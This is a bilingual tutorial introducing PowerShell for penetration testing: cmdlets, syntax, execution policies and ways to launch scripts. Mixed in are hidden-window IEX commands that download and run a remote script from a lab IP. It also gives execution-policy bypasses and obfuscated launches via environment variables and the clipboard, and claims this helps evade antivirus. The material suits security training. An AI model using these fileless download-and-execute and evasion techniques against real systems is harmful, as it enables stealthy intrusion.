Powershell penetration framework

Powershell basics

Introduction to Powershell

What is Windows PowerShell

Windows PowerShell is a task-based automation command-line shell and related scripting language created by Microsoft, based on the .NET framework.

is Microsoft's new shell that combines the functionality of the old Command Prompt (CMD) with a new set of scripting instructions with built-in system management capabilities.

It is used to control and automate the management of the Windows operating system and the applications running on the operating system.

It is widely used in penetration testing and other aspects. It can execute commands without writing to disk, and can also evade Anti-Virus detection.

Commands in Windows PowerShell are called cmdlets, pronounced "command-lets," where each cmdlet represents a specific function or task-based script.

Powershell is installed by default on Win7 and later systems.

operating system trust

Provides access to almost everything in the Windows operating system

Windows PowerShell Integrated Scripting Environment (ISE)

Why Use Windows PowerShell

It's both a scripting language and a command-line shell. It can interact with a varying number of technologies.

Windows PowerShell allows full access to all types in the .NET Framework. PowerShell is object-based.

Many interfaces to the GUIs designed by Microsoft for various products are front-end interfaces to PowerShell.

It is safer than running VBScript or other scripting languages.

By combining multiple commands and writing scripts, it can perform repetitive tasks more efficiently. Suppose a system administrator wishes to create hundreds of Active Directory users, he can only do so with the help of some PowerShell cmdlets placed in a script.

Many complex and time-consuming configurations and tasks can be done in a second using simple cmdlets of PowerShell.

How to start Windows PowerShell

PowerShell is available in all recent versions of Windows.

We need to follow the given steps to launch PowerShell: Search for Windows PowerShell. Select and click. A PowerShell window will open.

Difference Between PowerShell and Cmd Command Prompt

PowerShell

1、它是基于.NET框架的基于任务的自动化命令行
界面和关联的脚本语言。

2、它可以解释批处理和PowerShell命令。

3、它用于控制和自动化Windows服务器上的应用
程序和Windows操作系统。

4、PowerShell生成的输出不仅是字符流，而且是
对象的集合。

5、它既是Shell程序又是脚本编制环境，它支持创
建用于管理Windows操作系统的大文件。

cmd

1、它是Microsoft Windows操作系统的默认
命令行解释器。

2、它只能解释批处理命令。

3、它用于在控制台上执行给定的命令，可用
于调试问题。

4、命令提示符生成的输出只是字符流(文本)。

5、它只是一个shell系统，它允许用户仅执行
简单和基本的脚本来执行批处理文件。

Admin runs PowerShell

In the Windows operating system, there are five ways to run PowerShell as an administrator:

1. Using the Run window (for all versions of Windows), run PowerShell as an administrator.
2. Use the Cortana search bar (for Windows 10) to run PowerShell as an administrator.
3. Run PowerShell as an administrator at the command prompt.
4. Run PowerShell as administrator from Task Manager.
5. Run PowerShell as an administrator from the Start menu.

Windows PowerShell ISE

Microsoft Windows PowerShell ISE is a graphical user interface based application and is the default editor for Windows PowerShell.

ISE stands for Integrated Scripting Environment. It is an interface where we can run commands as well as write, test and debug PowerShell scripts without writing all the commands in the command line interface.

The Integrated Scripting Environment (ISE) provides tab completion, multi-line editing, syntax coloring, context-sensitive help, selective execution, and support for right-to-left languages.

The PowerShell ISE window contains the following three panes:

Scripts pane : This pane allows users to create and run scripts. Users can easily open, edit and run existing scripts in the script pane.

Output pane : This pane displays the output of the script and the commands that were run. You can also clear and copy the contents of the Output pane.

Command Pane : This pane allows the user to write commands. Easily execute single-line or multi-line commands in the command pane.

Create and run the script

Text editor to create scripts

Open any text editor and write the content of the test script:

echo "Hello world"

Save the file as test.ps1, double-click to run!

Integrated scripting environment to create scripts

Open Windows PowerShell ISE, create a new empty file, write the content of the script to be executed, and save the file as test.ps1

Click on the menu bar to run, or the shortcut key F5 to run the script

Load and execute local scripts

powershell -f test.ps1  #需要指定路径

Load and execute remote scripts

Powershell remote download code script execution

powershell -c "Invoke-Expression (New-Object 
System.Net.WebClient).DownloadString('https://192.168.88.128:80/test.ps1')"

Invoke-Expression(IEX的别名)：用来把字符串当作命令执行。

WindowStyle Hidden(-w Hidden)：隐藏窗口

Nonlnteractive(-NonI)：非交互模式，PowerShell不为用户提供交互的提示。

NoProfile(-NoP)：PowerShell控制台不加载当前用户的配置文件。

Noexit(-Noe)：执行后不退出Shell。

EncodedCommand(-enc): 接受base64 encode的字符串编码，避免一些解析问题

WebClient class: Provides common methods for sending data to and receiving data from a resource identified by a URI.

https://learn.microsoft.com/zh-cn/dotnet/api/system.net.webclient?view=net-6.0

DownloadString method: Downloads the requested resource as a String. The resource to download can be specified as a String containing a URI or as a Uri.

https://learn.microsoft.com/zh-cn/dotnet/api/system.net.webclient.downloadstring?view=net-6.0

Script Execution Policy

When launching PowerShell in a computer system, the default execution policy does not allow us to execute or run scripts.

View the current execution policy

Get-ExecutionPolicy

Get all execution policies affecting the current session and display them in order of preference

Get-ExecutionPolicy -List

Set the execution policy to Bypass

Set-ExecutionPolicy Bypass

#需要使用管理员权限启动power shell

Enforce policy settings for specific users

Set-ExecutionPolicy Unrestricted -Scope LocalMachine

View in detail: https://learn.microsoft.com/zh-cn/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.3

The following types of execution policies can be set in PowerShell:

name	illustrate
AllSigned	AllSigned Allows execution of all digitally signed scripts.
Bypass	Nothing is blocked, and there are no warnings or prompts.
Default	Set the default execution policy. Restricted applies to Windows clients. Remote signing for Windows servers
RemoteSigned	Scripts downloaded from the network with digital signatures are allowed to be executed; scripts created locally do not require scripts to have digital signatures and can be executed directly.
Restricted	Restricted, you can execute a single command, but you cannot execute a script, and an error will be reported when executing it. The default policy in Windows8, Windows 8.1, and Windows Server 2012.
Undefined	Undefined means no scripting policy is set. Of course at this point inheritance or default scripting policies will be applied.
Unrestricted	Allow unsigned scripts to run. Scripts downloaded from the Internet will be prompted for security before running. Need to confirm whether to execute the script.

Bypass is the most commonly used

Bypass enforcement policy

Read it locally and run it through the pipe character

powershell Get-Content C:\Users\xxxxx\Desktop\powershell\test.ps1 | powershell -

Remotely download and run scripts through IEX

powershell -w hidden "IEX(New-Object
Net.WebClient).DownloadString('http://192.168.88.128:80/test.ps1')"

Bypass execution policy bypass

powershell -executionpolicy bypass -f C:\Users\xxx\Desktop\powershell\test.ps1

UnrestrictedExecution Policy

powershell -executionpolicy unrestricted -f C:\Users\xxxx\Desktop\powershell\test.ps1

PowerShell Comments

single line comment

Single-line comments are comments typed with the pound sign # at the beginning of each line. Everything to the right of the # sign is ignored. If you write multiple lines in the script, you must use the pound sign # symbol at the beginning of each line.

# 单行注释.............

multiline comment

To comment multiple lines, place the <# symbol at the beginning of the first line and the #> symbol at the end of the last line.

<# 多行注释.........  
多行注释.........  
多行注释....................#>

PowerShell Cmdlet

Cmdlets are PowerShell's very important set of internal commands.

Cmdlets, pronounced " command-lets ", are lightweight commands used in the PowerShell environment. These are special commands that perform special functions within the PowerShell environment.

Cmdlets follow the verb-noun pattern, for example: set-childItem

Cmdlets are commands that exist as instances of .NET classes. Cmdlets can be written in any .NET language, or in the PowerShell scripting language.

It is not a simple executable, it has many attributes, these attributes are used to specify input parameters or use pipes to manage redirection. We can display the available Cmdlets by typing Get-Command.

Get-Command -CommandType Cmdlet

Common Cmdlet commands

View powershell version

$PSVersionTable

#别名 Get-Host

View current environment variables

Get-ChildItem env:

#别名gci ls dir

Start the specified program

Start-Process calc.exe

saps explorer.exe
 
#别名 saps start

Get the specified process information

Get-Process
Get-Process explorer

#别名 gps ps

Get file information

Get-Item 1.txt

#别名 gi

copy files

Copy-Item 1.txt 2.txt

#别名 cpi cp copy

move files

Move-Item 1.txt 2.txt

#别名 mi mv move

Get specified service information

Get-Service -Name Everything

Get file hash

Get-FileHash -Algorithm SHA1 1.txt
Get-FileHash -Algorithm MD5 1.txt

set text content

Set-Content 1.txt -Value "hello, word"

#别名 sc

Delete the contents of a file without deleting the file

Clear-Content 1.txt

get the current directory

Get-Location

#别名gl pwd

view aliases

Get-Alias -name dir

basic grammar

pipe character

|     #将一个命令的输出作为另一个命令的输入

semicolon

;   #分号用来连续执行系统命令

call operator

&   ##调用操作符，它允许你执行命令，脚本或函数

Output single and double quotes

""""
# 输出双引号
''''   
# 输出单引号

transport symbol

>   #将输出保存到指定文件中（用法：Get-Process > output.txt）
>>  #将脚本的输出追加到指定文件中（用法：test.ps1 >> output.txt）
2>  #将错误输出到指定文件中（Get-Porcess none 2> Errors.txt）
2>> #将错误追加到指定文件中（Get-Process none 2>> logs-Errors.txt）
-eq #等于运算符（用法：$var1 –eq $var2，返回真或假）
-gt #大于运算符（用法：$var1 –gt $var2，返回真或假）
-match     #匹配运算符，搜索字符串是否在文中出现（用法：$Text –match $string，返回真或假）
-replace   #替换字符串（用法：$Text –replace 被替换的字符,替换的字符，返回真或假）
-in       #测试一个字符或数字是否出现在文本中或列表中，声明列表直接使用（）

variable

Variables start with $

$w = "hello world"   # 变量赋值
$w   # 访问变量

array

$a = 'value1','value2','value3'     # 创建数组
$a[0]   # 访问数组第一个元素
$a = @()   # 空数组
$a = 1,'two',(get-date)

statement

Conditional statements

if($var {
    
    comparison_statement} $var2) {
    
    What_To_Do}
else {
    
    what_to_if_not}

loop statement

while() {
    
    }
Do {
    
    } While()
For(;;;) {
    
    }

Cmd to launch Powershell

normal method

cmd.exe /c "powershell -c Write-Host SUCCESS -Fore Green"

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell -"

pipe input stream

cmd.exe /c "echo Write-Host SUCCESS -Fore Green | powershell IEX $input"

environment variable

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && powershell IEX $env:cmd"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && cmd /c echo %cmd% | powershell -"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green && powershell IEX ([Environment]::GetEnvironmentVariable('cmd','Process'));"

cmd.exe /c "set cmd=Write-Host SUCCESS -Fore Green&&powershell IEX ((Get-ChildItem env:cmd).Value)"

Execute from pasteboard

cmd.exe /c "echo Write-Host CLIP -Fore Green | clip && powershell [void]  
[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); IEX 
([System.Windows.Forms.Clipboard]::GetText())"

bat script execution

@echo off
powershell -c Write-Host SUCCESS -Fore Green
pause

#不想有'请按任意键继续...' 可以去掉pause

[To be continued, CobaltStrikePowerShell loader and PowerSploit post-infiltration framework will be updated later...]